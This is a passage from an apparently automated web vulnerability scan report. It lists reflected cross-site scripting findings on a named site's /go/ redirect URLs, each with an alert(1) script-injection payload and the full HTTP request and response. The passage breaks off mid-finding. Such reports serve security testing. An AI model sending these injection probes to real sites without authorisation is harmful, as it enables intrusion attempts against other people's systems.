Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.google.com/bookmarks5c52e"><script>alert(1)</script>1704a0f5b4a/mark HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:06 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:06 GMT
Location: http://www.google.com/bookmarks5c52e\"><script>alert(1)</script>1704a0f5b4a/mark
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 823

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.google.com/bookmarks5c52e\"><script>alert(1)</script>1704a0f5b4a/mark" />
...[SNIP]...

1.343. http://www.whatisnetwork.com/go/http:/www.google.com/bookmarks/mark [REST URL parameter 5] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.google.com/bookmarks/mark

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ac9"><script>alert(1)</script>a4af2de3437 was submitted in the REST URL parameter 5. This input was echoed as 59ac9\"><script>alert(1)</script>a4af2de3437 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.google.com/bookmarks/mark59ac9"><script>alert(1)</script>a4af2de3437 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:07 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:09 GMT
Location: http://www.google.com/bookmarks/mark59ac9\"><script>alert(1)</script>a4af2de3437
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 823

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.google.com/bookmarks/mark59ac9\"><script>alert(1)</script>a4af2de3437" />
...[SNIP]...

1.344. http://www.whatisnetwork.com/go/http:/www.google.com/bookmarks/mark [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.google.com/bookmarks/mark

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a76"><script>alert(1)</script>6d4da86598b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24a76\"><script>alert(1)</script>6d4da86598b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.google.com/bookmarks/mark?24a76"><script>alert(1)</script>6d4da86598b=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:15:54 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:15:55 GMT
Location: http://www.google.com/bookmarks/mark?24a76\"><script>alert(1)</script>6d4da86598b=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 858

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.google.com/bookmarks/mark?24a76\"><script>alert(1)</script>6d4da86598b=1" />
...[SNIP]...

1.345. http://www.whatisnetwork.com/go/http:/www.google.com/buzz/post [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.google.com/buzz/post

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8271"><script>alert(1)</script>ba2f57ecb0f was submitted in the REST URL parameter 3. This input was echoed as a8271\"><script>alert(1)</script>ba2f57ecb0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.google.coma8271"><script>alert(1)</script>ba2f57ecb0f/buzz/post HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:10 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:11 GMT
Location: http://www.google.coma8271\"><script>alert(1)</script>ba2f57ecb0f/buzz/post
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 813

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.google.coma8271\"><script>alert(1)</script>ba2f57ecb0f/buzz/post" />
...[SNIP]...

1.346. http://www.whatisnetwork.com/go/http:/www.google.com/buzz/post [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.google.com/buzz/post

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bca5"><script>alert(1)</script>bee1b55cf59 was submitted in the REST URL parameter 4. This input was echoed as 8bca5\"><script>alert(1)</script>bee1b55cf59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.google.com/buzz8bca5"><script>alert(1)</script>bee1b55cf59/post HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:12 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:13 GMT
Location: http://www.google.com/buzz8bca5\"><script>alert(1)</script>bee1b55cf59/post
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 813

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.google.com/buzz8bca5\"><script>alert(1)</script>bee1b55cf59/post" />
...[SNIP]...

1.347. http://www.whatisnetwork.com/go/http:/www.google.com/buzz/post [REST URL parameter 5] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.google.com/buzz/post

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2faa6"><script>alert(1)</script>45f4c6c967e was submitted in the REST URL parameter 5. This input was echoed as 2faa6\"><script>alert(1)</script>45f4c6c967e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.google.com/buzz/post2faa6"><script>alert(1)</script>45f4c6c967e HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:14 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:14 GMT
Location: http://www.google.com/buzz/post2faa6\"><script>alert(1)</script>45f4c6c967e
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 813

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.google.com/buzz/post2faa6\"><script>alert(1)</script>45f4c6c967e" />
...[SNIP]...

1.348. http://www.whatisnetwork.com/go/http:/www.google.com/buzz/post [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.google.com/buzz/post

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0f6b"><script>alert(1)</script>769a02096a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0f6b\"><script>alert(1)</script>769a02096a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.google.com/buzz/post?f0f6b"><script>alert(1)</script>769a02096a2=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:15:58 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:15:58 GMT
Location: http://www.google.com/buzz/post?f0f6b\"><script>alert(1)</script>769a02096a2=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 848

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.google.com/buzz/post?f0f6b\"><script>alert(1)</script>769a02096a2=1" />
...[SNIP]...

1.349. http://www.whatisnetwork.com/go/http:/www.linkedin.com/shareArticle [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.linkedin.com/shareArticle

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf86"><script>alert(1)</script>9f59bd3284b was submitted in the REST URL parameter 3. This input was echoed as bdf86\"><script>alert(1)</script>9f59bd3284b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.linkedin.combdf86"><script>alert(1)</script>9f59bd3284b/shareArticle HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:26 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:27 GMT
Location: http://www.linkedin.combdf86\"><script>alert(1)</script>9f59bd3284b/shareArticle
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 823

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.linkedin.combdf86\"><script>alert(1)</script>9f59bd3284b/shareArticle" />
...[SNIP]...

1.350. http://www.whatisnetwork.com/go/http:/www.linkedin.com/shareArticle [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.linkedin.com/shareArticle

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ded79"><script>alert(1)</script>fd08feb4cc5 was submitted in the REST URL parameter 4. This input was echoed as ded79\"><script>alert(1)</script>fd08feb4cc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.linkedin.com/shareArticleded79"><script>alert(1)</script>fd08feb4cc5 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:30 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:31 GMT
Location: http://www.linkedin.com/shareArticleded79\"><script>alert(1)</script>fd08feb4cc5
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 823

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.linkedin.com/shareArticleded79\"><script>alert(1)</script>fd08feb4cc5" />
...[SNIP]...

1.351. http://www.whatisnetwork.com/go/http:/www.linkedin.com/shareArticle [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.linkedin.com/shareArticle

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc96"><script>alert(1)</script>c802af76de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3dc96\"><script>alert(1)</script>c802af76de5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.linkedin.com/shareArticle?3dc96"><script>alert(1)</script>c802af76de5=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:13 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:14 GMT
Location: http://www.linkedin.com/shareArticle?3dc96\"><script>alert(1)</script>c802af76de5=1
Vary: User-Agent,Accept-Encoding
Content-Length: 858
Connection: close
Content-Type: text/html; charset="utf-8"

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.linkedin.com/shareArticle?3dc96\"><script>alert(1)</script>c802af76de5=1" />
...[SNIP]...

1.352. http://www.whatisnetwork.com/go/http:/www.myspace.com/Modules/PostTo/Pages/ [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.myspace.com/Modules/PostTo/Pages/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d367"><script>alert(1)</script>8df4208dc9c was submitted in the REST URL parameter 3. This input was echoed as 8d367\"><script>alert(1)</script>8df4208dc9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.myspace.com8d367"><script>alert(1)</script>8df4208dc9c/Modules/PostTo/Pages/ HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:51 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:51 GMT
Location: http://www.myspace.com8d367\"><script>alert(1)</script>8df4208dc9c/Modules/PostTo/Pages/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 839

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.myspace.com8d367\"><script>alert(1)</script>8df4208dc9c/Modules/PostTo/Pages/" />
...[SNIP]...

1.353. http://www.whatisnetwork.com/go/http:/www.myspace.com/Modules/PostTo/Pages/ [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.myspace.com/Modules/PostTo/Pages/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33698"><script>alert(1)</script>b811bd9b9cd was submitted in the REST URL parameter 4. This input was echoed as 33698\"><script>alert(1)</script>b811bd9b9cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.myspace.com/Modules33698"><script>alert(1)</script>b811bd9b9cd/PostTo/Pages/ HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:52 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:52 GMT
Location: http://www.myspace.com/Modules33698\"><script>alert(1)</script>b811bd9b9cd/PostTo/Pages/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 839

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.myspace.com/Modules33698\"><script>alert(1)</script>b811bd9b9cd/PostTo/Pages/" />
...[SNIP]...

1.354. http://www.whatisnetwork.com/go/http:/www.myspace.com/Modules/PostTo/Pages/ [REST URL parameter 5] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.myspace.com/Modules/PostTo/Pages/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7483"><script>alert(1)</script>9dfc244bb30 was submitted in the REST URL parameter 5. This input was echoed as a7483\"><script>alert(1)</script>9dfc244bb30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.myspace.com/Modules/PostToa7483"><script>alert(1)</script>9dfc244bb30/Pages/ HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:53 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:53 GMT
Location: http://www.myspace.com/Modules/PostToa7483\"><script>alert(1)</script>9dfc244bb30/Pages/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 839

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.myspace.com/Modules/PostToa7483\"><script>alert(1)</script>9dfc244bb30/Pages/" />
...[SNIP]...

1.355. http://www.whatisnetwork.com/go/http:/www.myspace.com/Modules/PostTo/Pages/ [REST URL parameter 6] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.myspace.com/Modules/PostTo/Pages/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e56"><script>alert(1)</script>b26eac4813b was submitted in the REST URL parameter 6. This input was echoed as 42e56\"><script>alert(1)</script>b26eac4813b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.myspace.com/Modules/PostTo/Pages42e56"><script>alert(1)</script>b26eac4813b/ HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:54 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:55 GMT
Location: http://www.myspace.com/Modules/PostTo/Pages42e56\"><script>alert(1)</script>b26eac4813b/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 839

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.myspace.com/Modules/PostTo/Pages42e56\"><script>alert(1)</script>b26eac4813b/" />
...[SNIP]...

1.356. http://www.whatisnetwork.com/go/http:/www.myspace.com/Modules/PostTo/Pages/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.myspace.com/Modules/PostTo/Pages/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47cad"><script>alert(1)</script>89acfc0411c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47cad\"><script>alert(1)</script>89acfc0411c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

